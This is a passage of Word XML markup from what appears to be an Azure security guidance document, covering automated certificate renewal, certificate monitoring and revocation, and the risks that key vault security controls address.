        <w:t xml:space="preserve"> certificates and wildcard certificates in production environments:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C02B8F5" w14:textId="77777777" w:rsidR="000737AC" w:rsidRDefault="000737AC" w:rsidP="00E005E7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t>Self-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>signed</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> certificates: Lack third-party validation, cannot be revoked via public CRL/OCSP, and are rejected by modern browsers/clients.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="333E8F40" w14:textId="1B308210" w:rsidR="000737AC" w:rsidRDefault="000737AC" w:rsidP="00E005E7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t>Wildcard certificates: Broad scope increases risk if compromised; use subject alternative name (SAN) certificates with explicit FQDNs instead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF442F6" w14:textId="1C15C8B1" w:rsidR="000737AC" w:rsidRDefault="004F3ED4" w:rsidP="004F3ED4">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F3ED4">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>DP-7.2: Implement automated certificate renewal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C4DF6A" w14:textId="6127ED9D" w:rsidR="004F3ED4" w:rsidRDefault="004F3ED4" w:rsidP="00E005E7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="004F3ED4">
        <w:t>Eliminate service outages caused by expired certificates by automating renewal workflows that trigger well before expiration and seamlessly update certificates across dependent services without manual intervention.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74280A56" w14:textId="5DC60452" w:rsidR="004F3ED4" w:rsidRDefault="004F3ED4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="136"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004F3ED4">
        <w:t>Configure automated renewal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB75650" w14:textId="7CC77B5F" w:rsidR="00E005E7" w:rsidRPr="00E005E7" w:rsidRDefault="00E005E7" w:rsidP="00E005E7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E005E7">
        <w:lastRenderedPageBreak/>
        <w:t>Enable automated certificate renewal in Azure Key Vault by configuring lifetime actions to trigger renewal at a specified percentage of certificate lifetime:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7F474E" w14:textId="77777777" w:rsidR="004F3ED4" w:rsidRDefault="004F3ED4" w:rsidP="00E005E7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="137"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t>Recommended trigger: 80-90% of validity period (e.g., ~318 days for 397-day certificate).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00EAB35B" w14:textId="70DF3E05" w:rsidR="004F3ED4" w:rsidRDefault="004F3ED4" w:rsidP="00E005E7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="137"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Action: Automatically </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>renew</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (Key Vault requests renewal from CA without manual intervention)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BCFDD41" w14:textId="3D13C57C" w:rsidR="004F3ED4" w:rsidRDefault="004F3ED4" w:rsidP="00E005E7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="004F3ED4">
        <w:t>Configure notification contacts to alert administrators of upcoming certificate expirations before automatic renewal triggers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5650A6C7" w14:textId="5F68B62D" w:rsidR="004F3ED4" w:rsidRDefault="004F3ED4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="136"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004F3ED4">
        <w:t>Enable automatic certificate binding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="501F0A4A" w14:textId="73035BF7" w:rsidR="00E005E7" w:rsidRPr="00E005E7" w:rsidRDefault="004F3ED4" w:rsidP="00E005E7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">For </w:t>
      </w:r>
      <w:r w:rsidR="00E005E7" w:rsidRPr="00E005E7">
        <w:t>Azure services that support automatic certificate rotation (Azure App Service, Azure Application Gateway, Azure Front Door), configure these services to automatically retrieve updated certificates from Key Vault using managed identities or service principals with appropriate Key Vault access policies:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0960D0AC" w14:textId="51DA8C21" w:rsidR="004F3ED4" w:rsidRDefault="004F3ED4" w:rsidP="00E005E7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="138"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t>Azure services will automatically bind new certificate versions when renewed (typically within 24 hours, no service restart required)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E29308" w14:textId="77777777" w:rsidR="00E005E7" w:rsidRPr="00E005E7" w:rsidRDefault="00E005E7" w:rsidP="00E005E7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E005E7">
        <w:t>For applications that cannot automatically consume Key Vault certificates, implement manual certificate rotation workflows with operational runbooks and monitoring alerts to prevent expiration-related outages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="059FA243" w14:textId="22D7475C" w:rsidR="00E005E7" w:rsidRPr="00E005E7" w:rsidRDefault="00E005E7" w:rsidP="00E005E7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E005E7">
        <w:t>Maintain an inventory of all certificates in Azure Key Vault tracking certificate name, purpose, expiration date, dependent services, and renewal status</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="695FF02E" w14:textId="65A8A6EB" w:rsidR="004F3ED4" w:rsidRPr="00E64F30" w:rsidRDefault="004F3ED4" w:rsidP="00E64F30">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E64F30">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>DP-7.3: Monitor certificate lifecycle and handle revocation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="158A2F5E" w14:textId="2FFD5B7A" w:rsidR="004F3ED4" w:rsidRDefault="004F3ED4" w:rsidP="00E005E7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="004F3ED4">
        <w:t>Maintain continuous visibility into certificate health through automated monitoring, inventory queries, and dashboards that surface certificates nearing expiration, using deprecated cryptography, or lacking proper governance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F5993CE" w14:textId="03021C62" w:rsidR="004F3ED4" w:rsidRDefault="004F3ED4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="139"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004F3ED4">
        <w:t>Configure monitoring and alerting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D86C8B6" w14:textId="77777777" w:rsidR="004F3ED4" w:rsidRPr="004F3ED4" w:rsidRDefault="004F3ED4" w:rsidP="002B1003">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="004F3ED4">
        <w:t>Configure Azure Monitor alerts for certificate expiration events:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26CEB081" w14:textId="77777777" w:rsidR="004F3ED4" w:rsidRPr="004F3ED4" w:rsidRDefault="004F3ED4" w:rsidP="002B1003">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="140"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="004F3ED4">
        <w:t xml:space="preserve">Create </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004F3ED4">
        <w:t>alerts at</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004F3ED4">
        <w:t xml:space="preserve"> 30 days before expiration (warning notification).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539B88DA" w14:textId="62561C27" w:rsidR="004F3ED4" w:rsidRDefault="004F3ED4" w:rsidP="002B1003">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="140"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="004F3ED4">
        <w:t xml:space="preserve">Create </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004F3ED4">
        <w:t>alerts at</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004F3ED4">
        <w:t xml:space="preserve"> 7 days before expiration (critical alert with escalation to security team)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B543C6A" w14:textId="70B444C1" w:rsidR="004F3ED4" w:rsidRDefault="004F3ED4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="139"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004F3ED4">
        <w:t>Maintain certificate inventory and dashboards</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65633391" w14:textId="77777777" w:rsidR="009C0B70" w:rsidRDefault="009C0B70" w:rsidP="00E005E7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r>
        <w:t>Use Azure Resource Graph to query certificate inventory:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29BE257B" w14:textId="77777777" w:rsidR="009C0B70" w:rsidRDefault="009C0B70" w:rsidP="002B1003">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="141"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t>Query certificates nearing expiration (within 30/60/90 days).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB0B76C" w14:textId="77777777" w:rsidR="009C0B70" w:rsidRDefault="009C0B70" w:rsidP="002B1003">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="141"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t>Query self-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>signed</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> certificates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125B535C" w14:textId="5C799EF9" w:rsidR="009C0B70" w:rsidRDefault="009C0B70" w:rsidP="002B1003">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="141"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t>Query certificates using deprecated algorithms (e.g., SHA-1).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B792160" w14:textId="77777777" w:rsidR="009C0B70" w:rsidRPr="009C0B70" w:rsidRDefault="009C0B70" w:rsidP="00E005E7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="009C0B70">
        <w:t>Create certificate audit dashboards (e.g., Power BI) with visualizations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11021CA5" w14:textId="77777777" w:rsidR="009C0B70" w:rsidRPr="009C0B70" w:rsidRDefault="009C0B70" w:rsidP="002B1003">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="142"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="009C0B70">
        <w:t>Certificate expiration timeline by time bucket.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1911A555" w14:textId="77777777" w:rsidR="009C0B70" w:rsidRPr="009C0B70" w:rsidRDefault="009C0B70" w:rsidP="002B1003">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="142"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="009C0B70">
        <w:t>Self-signed certificate count by resource group.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D2F713A" w14:textId="55007AFB" w:rsidR="009C0B70" w:rsidRDefault="009C0B70" w:rsidP="002B1003">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="142"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="009C0B70">
        <w:lastRenderedPageBreak/>
        <w:t>Certificates using deprecated cryptographic standards.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BBC2FF8" w14:textId="2E2F5DD7" w:rsidR="009C0B70" w:rsidRDefault="009C0B70" w:rsidP="00E005E7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="009C0B70">
        <w:t>Review certificate audit dashboards regularly during security review meetings (recommended: quarterly).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40934A34" w14:textId="0B78E992" w:rsidR="009C0B70" w:rsidRDefault="009C0B70">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="139"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="009C0B70">
        <w:t>Establish revocation procedures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6026F4" w14:textId="77777777" w:rsidR="009C0B70" w:rsidRDefault="009C0B70" w:rsidP="00E005E7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r>
        <w:t>Establish certificate revocation procedures for compromised or retired certificates:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C31410" w14:textId="77777777" w:rsidR="009C0B70" w:rsidRDefault="009C0B70" w:rsidP="00E005E7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="143"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t>Document revocation process (disable certificate in Key Vault, notify dependent services).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E59736" w14:textId="77777777" w:rsidR="009C0B70" w:rsidRDefault="009C0B70" w:rsidP="00E005E7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="143"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t>Maintain incident response runbooks for certificate compromise scenarios.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73592169" w14:textId="22E6AD96" w:rsidR="009C0B70" w:rsidRDefault="009C0B70" w:rsidP="00E005E7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="143"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t>Monitor industry advisories for compromised root or intermediate CA certificates and block them promptly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51CC09F2" w14:textId="6EB89D55" w:rsidR="00E64F30" w:rsidRDefault="00E64F30" w:rsidP="00E64F30">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="48" w:name="_Toc242449511"/>
      <w:r w:rsidRPr="00E64F30">
        <w:t>DP-8: Ensure security of key and certificate repository</w:t>
      </w:r>
      <w:bookmarkEnd w:id="48"/>
    </w:p>
    <w:p w14:paraId="23FA9DE0" w14:textId="0BC33CCD" w:rsidR="00E64F30" w:rsidRDefault="00E64F30">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="144"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E64F30">
        <w:t>Security principle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1115C3F1" w14:textId="690EA5E7" w:rsidR="00E64F30" w:rsidRDefault="00E64F30" w:rsidP="002B1003">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E64F30">
        <w:t xml:space="preserve">Secure key vault services through defense-in-depth controls: least-privilege access, network isolation, comprehensive logging and monitoring, backup and recovery capabilities, and HSM-backed protection where required. Key vaults are critical infrastructure that </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E64F30">
        <w:t>protect</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E64F30">
        <w:t xml:space="preserve"> cryptographic keys and certificates used for encryption and authentication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="737031F3" w14:textId="02133A43" w:rsidR="00E64F30" w:rsidRDefault="00E64F30">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="144"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E64F30">
        <w:t xml:space="preserve">Risk </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E64F30">
        <w:t>to mitigate</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6A0B863F" w14:textId="554F97B5" w:rsidR="00E64F30" w:rsidRDefault="00E64F30" w:rsidP="00A04309">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E64F30">
        <w:t>Key exfiltration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="509FE57B" w14:textId="44C7B34B" w:rsidR="00E64F30" w:rsidRDefault="00E64F30" w:rsidP="00E005E7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="457"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00E64F30">
        <w:t>Stolen KEKs / HSM material permits bulk decryption of stored data and traffic interception</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A61542" w14:textId="7C021DCD" w:rsidR="00E64F30" w:rsidRDefault="00E64F30" w:rsidP="00E005E7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00E64F30">
        <w:t>Shadow administrative access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F429CE" w14:textId="0315D94F" w:rsidR="00E64F30" w:rsidRDefault="00E64F30" w:rsidP="00E005E7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="457"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00E64F30">
        <w:t>Over-broad RBAC or policy misconfiguration enables illicit key export, purge, or version rollback.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A0A27B8" w14:textId="05659CBE" w:rsidR="00E64F30" w:rsidRDefault="00E64F30" w:rsidP="00A04309">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E64F30">
        <w:t>Silent tampering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A067E61" w14:textId="18A6E70B" w:rsidR="00E64F30" w:rsidRDefault="00E64F30" w:rsidP="00A04309">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="457"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00E64F30">
        <w:t>Malicious key replacement enables transparent man</w:t>
      </w:r>
      <w:r w:rsidRPr="00E64F30">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>‑</w:t>
      </w:r>
      <w:r w:rsidRPr="00E64F30">
        <w:t>in</w:t>
      </w:r>
      <w:r w:rsidRPr="00E64F30">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>‑</w:t>
      </w:r>
      <w:r w:rsidRPr="00E64F30">
        <w:t>the</w:t>
      </w:r>
      <w:r w:rsidRPr="00E64F30">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>‑</w:t>
      </w:r>
      <w:r w:rsidRPr="00E64F30">
        <w:t>middle or forged code/signatures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="010CDA80" w14:textId="471EF6AF" w:rsidR="00E64F30" w:rsidRDefault="00E64F30" w:rsidP="00A04309">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E64F30">
        <w:t>Network exposure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A645D7" w14:textId="27329818" w:rsidR="00E64F30" w:rsidRDefault="00E64F30" w:rsidP="00E005E7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="458"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00E64F30">
        <w:t>Public endpoint abuse (credential stuffing, API probing) increases attack surface for brute-force or token replay</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C28F96" w14:textId="3E6D8F74" w:rsidR="00E64F30" w:rsidRDefault="00E64F30" w:rsidP="00A04309">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E64F30">
        <w:t>Accidental destructive actions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0640CA9F" w14:textId="423E9B32" w:rsidR="00E64F30" w:rsidRDefault="00E64F30" w:rsidP="00E005E7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="458"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00E64F30">
        <w:t>Missing soft delete / purge protection leads to irreversible cryptographic data loss.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D865E1" w14:textId="2BAF1317" w:rsidR="00E64F30" w:rsidRDefault="00E64F30" w:rsidP="002B1003">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E64F30">
        <w:t>Insufficient audit lineage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F02069" w14:textId="290505E4" w:rsidR="00E64F30" w:rsidRDefault="00E64F30" w:rsidP="00E005E7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="458"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00E64F30">
        <w:lastRenderedPageBreak/>
        <w:t>Lack of immutable logs impairs incident response and regulatory evidentiary needs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44BFF2C3" w14:textId="088E3BCF" w:rsidR="00E64F30" w:rsidRDefault="00E64F30" w:rsidP="00E005E7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E64F30">
        <w:t>Unsegmented tenancy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3426D9F2" w14:textId="4E5CA003" w:rsidR="00E64F30" w:rsidRDefault="00E64F30" w:rsidP="00E005E7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="458"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00E64F30">
        <w:t>Co-mingled application keys broaden lateral movement blast radius after a single identity compromise</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C6FA6BA" w14:textId="6C421893" w:rsidR="00E64F30" w:rsidRDefault="00E64F30">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
